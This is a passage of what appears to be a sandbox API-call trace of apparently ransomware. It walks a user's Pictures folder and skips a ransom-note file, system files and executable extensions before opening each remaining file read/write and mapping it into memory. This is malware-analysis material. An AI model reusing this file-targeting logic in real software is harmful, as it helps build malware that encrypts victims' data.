HALPmcxz\\Pictures\\nTwgr\\", lpString2="ixqs-N95mkCcdeR5.gif.3n0IXgB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif.3n0IXgB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif.3n0IXgB" [0186.050] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.050] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ixqs-N95mkCcdeR5.gif.3n0IXgB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ixqs-n95mkccder5.gif.3n0ixgb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.051] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=28201) returned 1 [0186.051] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.051] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.051] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.052] CloseHandle (hObject=0x268) returned 1 [0186.052] CloseHandle (hObject=0x264) returned 1 [0186.052] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.052] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57062b80, ftCreationTime.dwHighDateTime=0x1d4ce98, ftLastAccessTime.dwLowDateTime=0x1c9408a0, ftLastAccessTime.dwHighDateTime=0x1d4c6b9, ftLastWriteTime.dwLowDateTime=0xafaee7c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd875, dwReserved0=0x0, dwReserved1=0x0, cFileName="J5SxN.gif.Lhym", cAlternateFileName="J5SXNG~1.LHY")) returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="DECRYPT-FILES.txt") returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="autorun.inf") returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="boot.ini") returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="desktop.ini") returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="ntuser.dat") returned -1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="iconcache.db") returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="bootsect.bak") returned 1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="ntuser.dat.log") returned -1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="thumbs.db") returned -1 [0186.052] lstrcmpiW (lpString1="J5SxN.gif.Lhym", lpString2="Bootfont.bin") returned 1 [0186.052] lstrlenW (lpString="J5SxN.gif.Lhym") returned 14 [0186.052] lstrcmpiW (lpString1="Lhym", lpString2="lnk") returned -1 [0186.052] lstrcmpiW (lpString1="Lhym", lpString2="exe") returned 1 [0186.052] lstrcmpiW (lpString1="Lhym", lpString2="sys") returned -1 [0186.052] lstrcmpiW (lpString1="Lhym", lpString2="dll") returned 1 [0186.052] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.052] lstrlenW (lpString="J5SxN.gif.Lhym") returned 14 [0186.052] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.052] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="J5SxN.gif.Lhym" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif.Lhym") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif.Lhym" [0186.052] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif.Lhym" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\j5sxn.gif.lhym"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.053] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=55413) returned 1 [0186.053] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.053] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.054] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.054] CloseHandle (hObject=0x268) returned 1 [0186.054] CloseHandle (hObject=0x264) returned 1 [0186.054] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.054] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc02ec80, ftCreationTime.dwHighDateTime=0x1d4c52f, ftLastAccessTime.dwLowDateTime=0x60cc3ac0, ftLastAccessTime.dwHighDateTime=0x1d4d22f, ftLastWriteTime.dwLowDateTime=0xafb3aa80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd747, dwReserved0=0x0, dwReserved1=0x0, cFileName="ltk0Cu1D.jpg.SJR5", cAlternateFileName="LTK0CU~1.SJR")) returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="DECRYPT-FILES.txt") returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="autorun.inf") returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="boot.ini") returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="desktop.ini") returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="ntuser.dat") returned -1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="iconcache.db") returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="bootsect.bak") returned 1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="ntuser.dat.log") returned -1 [0186.054] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="thumbs.db") returned -1 [0186.055] lstrcmpiW (lpString1="ltk0Cu1D.jpg.SJR5", lpString2="Bootfont.bin") returned 1 [0186.055] lstrlenW (lpString="ltk0Cu1D.jpg.SJR5") returned 17 [0186.055] lstrcmpiW (lpString1="SJR5", lpString2="lnk") returned 1 [0186.055] lstrcmpiW (lpString1="SJR5", lpString2="exe") returned 1 [0186.055] lstrcmpiW (lpString1="SJR5", lpString2="sys") returned -1 [0186.055] lstrcmpiW (lpString1="SJR5", lpString2="dll") returned 1 [0186.055] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.055] lstrlenW (lpString="ltk0Cu1D.jpg.SJR5") returned 17 [0186.055] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.055] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="ltk0Cu1D.jpg.SJR5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg.SJR5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg.SJR5" [0186.055] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ltk0Cu1D.jpg.SJR5" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\ltk0cu1d.jpg.sjr5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.055] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=55111) returned 1 [0186.055] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.055] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.056] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.056] CloseHandle (hObject=0x268) returned 1 [0186.056] CloseHandle (hObject=0x264) returned 1 [0186.056] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.056] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf8847f0, ftCreationTime.dwHighDateTime=0x1d4d23b, ftLastAccessTime.dwLowDateTime=0xf0cf01e0, ftLastAccessTime.dwHighDateTime=0x1d4c701, ftLastWriteTime.dwLowDateTime=0xafb60be0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1737a, dwReserved0=0x0, dwReserved1=0x0, cFileName="M7hZT_FgQuoNi6H.bmp.GqVeHV", cAlternateFileName="M7HZT_~1.GQV")) returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="DECRYPT-FILES.txt") returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="autorun.inf") returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="boot.ini") returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="desktop.ini") returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="ntuser.dat") returned -1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="iconcache.db") returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="bootsect.bak") returned 1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="ntuser.dat.log") returned -1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="thumbs.db") returned -1 [0186.057] lstrcmpiW (lpString1="M7hZT_FgQuoNi6H.bmp.GqVeHV", lpString2="Bootfont.bin") returned 1 [0186.057] lstrlenW (lpString="M7hZT_FgQuoNi6H.bmp.GqVeHV") returned 26 [0186.057] lstrcmpiW (lpString1="GqVeHV", lpString2="lnk") returned -1 [0186.057] lstrcmpiW (lpString1="GqVeHV", lpString2="exe") returned 1 [0186.057] lstrcmpiW (lpString1="GqVeHV", lpString2="sys") returned -1 [0186.057] lstrcmpiW (lpString1="GqVeHV", lpString2="dll") returned 1 [0186.057] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.057] lstrlenW (lpString="M7hZT_FgQuoNi6H.bmp.GqVeHV") returned 26 [0186.057] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.057] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="M7hZT_FgQuoNi6H.bmp.GqVeHV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp.GqVeHV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp.GqVeHV" [0186.057] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\M7hZT_FgQuoNi6H.bmp.GqVeHV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\m7hzt_fgquoni6h.bmp.gqvehv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.057] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=95098) returned 1 [0186.058] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.058] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.058] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.058] CloseHandle (hObject=0x268) returned 1 [0186.058] CloseHandle (hObject=0x264) returned 1 [0186.058] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.059] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3beb2120, ftCreationTime.dwHighDateTime=0x1d4d47e, ftLastAccessTime.dwLowDateTime=0xafe51030, ftLastAccessTime.dwHighDateTime=0x1d4c79b, ftLastWriteTime.dwLowDateTime=0xafbacea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfc04, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiKHLksvTxyN7KMU5.png.T135Gjq", cAlternateFileName="MIKHLK~1.T13")) returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="DECRYPT-FILES.txt") returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="autorun.inf") returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="boot.ini") returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="desktop.ini") returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="ntuser.dat") returned -1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="iconcache.db") returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="bootsect.bak") returned 1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="ntuser.dat.log") returned -1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="thumbs.db") returned -1 [0186.059] lstrcmpiW (lpString1="MiKHLksvTxyN7KMU5.png.T135Gjq", lpString2="Bootfont.bin") returned 1 [0186.059] lstrlenW (lpString="MiKHLksvTxyN7KMU5.png.T135Gjq") returned 29 [0186.059] lstrcmpiW (lpString1="T135Gjq", lpString2="lnk") returned 1 [0186.059] lstrcmpiW (lpString1="T135Gjq", lpString2="exe") returned 1 [0186.059] lstrcmpiW (lpString1="T135Gjq", lpString2="sys") returned 1 [0186.059] lstrcmpiW (lpString1="T135Gjq", lpString2="dll") returned 1 [0186.059] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.059] lstrlenW (lpString="MiKHLksvTxyN7KMU5.png.T135Gjq") returned 29 [0186.059] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.059] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="MiKHLksvTxyN7KMU5.png.T135Gjq" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png.T135Gjq") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png.T135Gjq" [0186.059] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\MiKHLksvTxyN7KMU5.png.T135Gjq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\mikhlksvtxyn7kmu5.png.t135gjq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.060] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=64516) returned 1 [0186.060] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.060] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.061] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.061] CloseHandle (hObject=0x268) returned 1 [0186.061] CloseHandle (hObject=0x264) returned 1 [0186.061] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.061] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d163a70, ftCreationTime.dwHighDateTime=0x1d4d25e, ftLastAccessTime.dwLowDateTime=0xf342eda0, ftLastAccessTime.dwHighDateTime=0x1d4c9aa, ftLastWriteTime.dwLowDateTime=0xafbf9160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xc85f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScBBHmEAV.gif.8PDnT", cAlternateFileName="SCBBHM~1.8PD")) returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="DECRYPT-FILES.txt") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="autorun.inf") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="boot.ini") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="desktop.ini") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="ntuser.dat") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="iconcache.db") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="bootsect.bak") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="ntuser.dat.log") returned 1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="thumbs.db") returned -1 [0186.061] lstrcmpiW (lpString1="ScBBHmEAV.gif.8PDnT", lpString2="Bootfont.bin") returned 1 [0186.061] lstrlenW (lpString="ScBBHmEAV.gif.8PDnT") returned 19 [0186.061] lstrcmpiW (lpString1="8PDnT", lpString2="lnk") returned -1 [0186.061] lstrcmpiW (lpString1="8PDnT", lpString2="exe") returned -1 [0186.061] lstrcmpiW (lpString1="8PDnT", lpString2="sys") returned -1 [0186.061] lstrcmpiW (lpString1="8PDnT", lpString2="dll") returned -1 [0186.061] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.061] lstrlenW (lpString="ScBBHmEAV.gif.8PDnT") returned 19 [0186.061] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.062] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="ScBBHmEAV.gif.8PDnT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif.8PDnT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif.8PDnT" [0186.062] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\ScBBHmEAV.gif.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\scbbhmeav.gif.8pdnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.062] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=51295) returned 1 [0186.062] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.062] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.063] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.063] CloseHandle (hObject=0x268) returned 1 [0186.063] CloseHandle (hObject=0x264) returned 1 [0186.063] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.063] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceb7cef0, ftCreationTime.dwHighDateTime=0x1d4d58b, ftLastAccessTime.dwLowDateTime=0x415ad610, ftLastAccessTime.dwHighDateTime=0x1d4ca55, ftLastWriteTime.dwLowDateTime=0xafbf9160, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x43e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SHZ406jI.jpg.8PDnT", cAlternateFileName="SHZ406~1.8PD")) returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="DECRYPT-FILES.txt") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="autorun.inf") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="boot.ini") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="desktop.ini") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="ntuser.dat") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="iconcache.db") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="bootsect.bak") returned 1 [0186.063] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="ntuser.dat.log") returned 1 [0186.064] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="thumbs.db") returned -1 [0186.064] lstrcmpiW (lpString1="SHZ406jI.jpg.8PDnT", lpString2="Bootfont.bin") returned 1 [0186.064] lstrlenW (lpString="SHZ406jI.jpg.8PDnT") returned 18 [0186.064] lstrcmpiW (lpString1="8PDnT", lpString2="lnk") returned -1 [0186.064] lstrcmpiW (lpString1="8PDnT", lpString2="exe") returned -1 [0186.064] lstrcmpiW (lpString1="8PDnT", lpString2="sys") returned -1 [0186.064] lstrcmpiW (lpString1="8PDnT", lpString2="dll") returned -1 [0186.064] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0186.064] lstrlenW (lpString="SHZ406jI.jpg.8PDnT") returned 18 [0186.064] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" [0186.064] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\", lpString2="SHZ406jI.jpg.8PDnT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg.8PDnT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg.8PDnT" [0186.064] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.064] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\SHZ406jI.jpg.8PDnT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\shz406ji.jpg.8pdnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0186.064] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=17382) returned 1 [0186.064] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0186.064] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0186.065] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0186.065] CloseHandle (hObject=0x268) returned 1 [0186.065] CloseHandle (hObject=0x264) returned 1 [0186.065] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.065] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, 